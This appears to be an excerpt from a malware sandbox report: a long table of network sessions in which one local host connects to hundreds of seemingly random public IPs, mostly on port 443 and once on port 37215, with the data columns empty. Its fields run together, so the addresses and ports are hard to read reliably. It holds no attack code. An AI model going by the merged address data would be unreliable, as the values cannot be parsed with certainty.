                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21941192.168.2.1335808102.211.192.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21942192.168.2.135433685.26.213.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21943192.168.2.1333072209.90.40.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21944192.168.2.134285893.237.1.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21945192.168.2.134772437.120.211.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21946192.168.2.1355198206.246.56.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21947192.168.2.1338042191.5.88.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21948192.168.2.1347588217.29.74.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21949192.168.2.1355436207.24.218.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21950192.168.2.134009254.32.193.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21951192.168.2.133441638.49.26.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21952192.168.2.1345986112.117.114.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21953192.168.2.134098474.163.29.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21954192.168.2.133847220.221.34.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21955192.168.2.1352670161.161.124.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21956192.168.2.1359148132.99.190.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21957192.168.2.133837470.136.35.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21958192.168.2.1340964191.215.2.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21959192.168.2.134802442.138.150.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21960192.168.2.135873285.228.42.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21961192.168.2.133528043.152.60.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21962192.168.2.133306454.188.86.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21963192.168.2.1335240207.28.1.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21964192.168.2.1358280131.141.19.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21965192.168.2.133691858.67.193.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21966192.168.2.1333238213.74.103.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21967192.168.2.1360150134.95.154.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21968192.168.2.134624427.47.141.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21969192.168.2.134234479.174.101.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21970192.168.2.134991094.1.225.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21971192.168.2.1344204124.124.34.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21972192.168.2.1356918192.219.126.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21973192.168.2.134579024.106.136.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21974192.168.2.1347328160.97.181.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21975192.168.2.1345736200.102.138.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21976192.168.2.134003469.64.120.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21977192.168.2.133844282.194.245.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21978192.168.2.1352230192.9.117.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21979192.168.2.1348006145.64.129.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21980192.168.2.1346542195.222.172.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21981192.168.2.133927223.65.22.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21982192.168.2.133284445.211.19.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21983192.168.2.1359032194.83.57.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21984192.168.2.1335404204.190.134.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21985192.168.2.135354866.121.146.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21986192.168.2.133339040.214.145.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21987192.168.2.1357402104.137.41.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21988192.168.2.1351926142.161.83.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21989192.168.2.133629865.189.66.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21990192.168.2.1355426130.95.185.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21991192.168.2.1337638158.158.161.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21992192.168.2.1341390210.209.224.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21993192.168.2.133311476.11.17.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21994192.168.2.1333996138.177.21.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21995192.168.2.13583568.101.120.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21996192.168.2.1335794150.46.46.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21997192.168.2.1357392100.228.97.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21998192.168.2.1337142153.137.240.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21999192.168.2.135973079.44.179.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22000192.168.2.133774096.95.220.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22001192.168.2.1358932124.35.232.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22002192.168.2.1353090184.152.103.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22003192.168.2.135870232.117.65.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22004192.168.2.134300462.17.48.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22005192.168.2.135356034.206.199.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22006192.168.2.1353404132.243.134.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22007192.168.2.133303469.75.0.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22008192.168.2.1338080132.151.206.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22009192.168.2.135254098.161.103.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22010192.168.2.1335006174.200.20.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22011192.168.2.134604443.148.51.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22012192.168.2.1349706152.146.87.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22013192.168.2.133378866.91.48.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22014192.168.2.134407447.25.219.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22015192.168.2.1357542212.76.247.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22016192.168.2.1347440190.224.96.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22017192.168.2.1358106133.59.140.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22018192.168.2.1343336181.30.101.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22019192.168.2.1342726177.184.27.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22020192.168.2.1333790192.197.183.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22021192.168.2.133400851.15.75.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22022192.168.2.134059660.48.81.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22023192.168.2.1337144168.49.42.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22024192.168.2.133995873.81.98.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22025192.168.2.135246894.253.107.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22026192.168.2.135718063.177.70.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22027192.168.2.1349522125.11.238.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22028192.168.2.1345674101.226.97.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22029192.168.2.134190897.216.224.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22030192.168.2.134287294.247.47.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22031192.168.2.1341676138.0.220.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22032192.168.2.135801645.89.207.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22033192.168.2.135297660.168.164.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22034192.168.2.1339442102.139.226.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22035192.168.2.135399050.183.230.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22036192.168.2.135591272.223.141.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22037192.168.2.1343126149.199.34.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22038192.168.2.1335876102.110.33.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22039192.168.2.134007653.243.93.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22040192.168.2.1336476125.103.91.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22041192.168.2.13565182.192.168.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22042192.168.2.1333838134.30.46.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22043192.168.2.134659088.229.241.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22044192.168.2.1339354147.52.172.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22045192.168.2.1345106212.147.64.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22046192.168.2.1355438147.18.251.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22047192.168.2.1359944105.30.225.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22048192.168.2.133486651.111.133.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22049192.168.2.134600050.177.41.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22050192.168.2.1339704177.41.69.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22051192.168.2.1349720114.79.104.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22052192.168.2.1357430217.104.188.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22053192.168.2.134786295.99.223.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22054192.168.2.135354257.97.210.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22055192.168.2.1337630140.236.218.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22056192.168.2.1354972179.223.180.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22057192.168.2.1336682106.183.251.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22058192.168.2.1352154195.155.160.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22059192.168.2.135022058.219.3.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22060192.168.2.135657699.230.157.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22061192.168.2.133910077.196.53.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22062192.168.2.134406861.171.95.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22063192.168.2.1345524156.77.249.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22064192.168.2.1333648132.233.163.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22065192.168.2.135739213.45.254.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22066192.168.2.1354178134.0.157.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22067192.168.2.1335402220.221.226.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22068192.168.2.135445817.59.143.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22069192.168.2.1359358145.177.2.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22070192.168.2.1346476164.204.85.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22071192.168.2.1359434181.235.64.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22072192.168.2.135576478.74.146.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22073192.168.2.133449474.196.52.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22074192.168.2.1342098109.246.196.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22075192.168.2.1335082163.149.97.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22076192.168.2.133334023.87.127.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22077192.168.2.1337130192.251.245.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22078192.168.2.135307063.0.15.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22079192.168.2.1351108181.4.50.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22080192.168.2.1349248166.206.42.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22081192.168.2.134933445.80.94.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22082192.168.2.1360736124.152.149.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22083192.168.2.133842214.144.80.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22084192.168.2.135842698.68.9.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22085192.168.2.1337964223.32.137.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22086192.168.2.1359708218.206.37.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22087192.168.2.133735013.157.240.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22088192.168.2.1344882195.14.243.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22089192.168.2.134535244.4.26.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22090192.168.2.1358964136.32.137.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22091192.168.2.1355652205.155.190.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22092192.168.2.1343182162.79.73.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22093192.168.2.1341706176.10.104.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22094192.168.2.1345484116.150.136.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22095192.168.2.1343432199.248.79.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22096192.168.2.133429296.92.170.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22097192.168.2.1336330216.0.249.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22098192.168.2.1347116183.101.73.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22099192.168.2.134123242.106.212.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22100192.168.2.1339862143.87.27.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22101192.168.2.1333134112.86.148.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22102192.168.2.134368675.15.61.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22103192.168.2.134487676.35.51.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22104192.168.2.1343990162.169.204.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22105192.168.2.1344190173.124.95.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22106192.168.2.1357460220.84.72.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22107192.168.2.1356824129.99.187.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22108192.168.2.1340150195.226.201.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22109192.168.2.136033843.110.130.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22110192.168.2.133361862.176.167.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22111192.168.2.1357706198.232.125.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22112192.168.2.134651671.90.120.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22113192.168.2.1351842222.126.159.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22114192.168.2.133842431.225.229.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22115192.168.2.135547217.158.203.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22116192.168.2.1343428143.207.7.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22117192.168.2.1332948131.138.95.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22118192.168.2.1341860133.190.192.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22119192.168.2.1350240132.196.239.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22120192.168.2.1350378193.223.181.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22121192.168.2.133665825.194.119.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22122192.168.2.136098051.96.129.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22123192.168.2.135398871.58.193.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22124192.168.2.133454663.20.149.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22125192.168.2.1345172142.238.110.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22126192.168.2.1350564212.166.10.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22127192.168.2.133287098.47.120.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22128192.168.2.135960883.43.44.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22129192.168.2.135599076.196.65.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22130192.168.2.1345582116.86.36.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22131192.168.2.1346704188.236.212.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22132192.168.2.134628489.211.107.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22133192.168.2.135886288.14.19.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22134192.168.2.1335436141.111.134.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22135192.168.2.1350368104.218.186.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22136192.168.2.1340728221.70.186.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22137192.168.2.1348372204.210.17.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22138192.168.2.1339650175.186.35.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22139192.168.2.13588144.135.45.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22140192.168.2.135531423.213.15.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22141192.168.2.1353340196.189.214.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22142192.168.2.1333424159.28.251.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22143192.168.2.1348412170.155.122.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22144192.168.2.1348752206.230.111.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22145192.168.2.1336574194.249.70.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22146192.168.2.135525275.79.45.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22147192.168.2.1358794171.234.63.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22148192.168.2.1353874210.172.97.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22149192.168.2.134079434.43.148.21437215
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22150192.168.2.1360956195.89.141.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22151192.168.2.135385675.147.17.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22152192.168.2.1333624166.231.254.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22153192.168.2.134194897.208.71.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22154192.168.2.1355614212.241.203.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22155192.168.2.1336636221.61.244.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22156192.168.2.135416659.108.208.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22157192.168.2.133697447.255.140.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22158192.168.2.1343276134.235.134.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22159192.168.2.134847457.220.212.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22160192.168.2.136004246.55.161.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22161192.168.2.1333600113.19.122.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22162192.168.2.1359274106.159.228.42443
